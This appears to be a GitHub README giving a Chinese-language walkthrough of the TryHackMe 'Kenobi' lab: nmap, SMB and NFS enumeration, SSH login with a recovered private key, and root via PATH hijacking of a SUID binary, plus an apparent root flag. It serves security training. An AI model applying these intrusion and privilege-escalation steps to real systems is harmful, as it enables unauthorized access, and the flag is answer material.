ianix34/tryhackme-kenobi
GitHub: ianix34/tryhackme-kenobi
一份 TryHackMe Kenobi 房间的渗透测试实战演练记录,覆盖从信息枚举到权限提升的完整攻击链路。
Stars: 0 | Forks: 0
# tryhackme-kenobi
实用渗透测试 (kenobi thm) - 枚举、NFS 利用以及通过 PATH 劫持进行权限提升。
# Kenobi - TryHackMe 实战演练
📌 概述
本房间涵盖:
- 枚举 (Nmap, SMB, NFS)
- FTP 漏洞利用
- 通过 PATH 劫持进行权限提升
🔍 侦察
### Nmap 扫描
bash nmap -sC -sV
开放端口:
- 21 (FTP)
- 22 (SSH)
- 80 (HTTP)
- 111 (RPC)
- 139/445 (SMB)
- 2049 (NFS)
📂 枚举
### SMB
bash smbclient -L //
### NFS
bash showmount -e
挂载共享:
bash mount :/var /mnt/kenobiNFS
🔑 初始访问
发现私钥:
bash /tmp/id_rsa
用于 SSH:
bash ssh -i id_rsa kenobi@
## 权限提升
发现 SUID 二进制文件:
bash /usr/bin/menu
PATH 劫持:
bash echo "/bin/sh" > /tmp/curl chmod +x /tmp/curl export PATH=/tmp:$PATH /usr/bin/menu
获取 Root 权限:
bash id uid=0(root)
# Flag
User flag:
Root flag:
<177b3cd8562289f37382721c28381f02>
标签:CTF Writeup, CTF攻略, CTF靶机, CTI, FTP漏洞, Kenobi, Linux提权, NFS挂载, NFS漏洞利用, Nmap扫描, osquery, PATH劫持, Privilege Escalation, Red Team, RPC枚举, SMB枚举, SSH私钥登录, SUID提权, TryHackMe, Web报告查看器, 内存分配, 协议分析, 安全实验, 安全攻防, 应用安全, 插件系统, 权限提升, 漏洞复现, 网络 Enumeration, 网络安全, 运维安全, 隐私保护, 靶机通关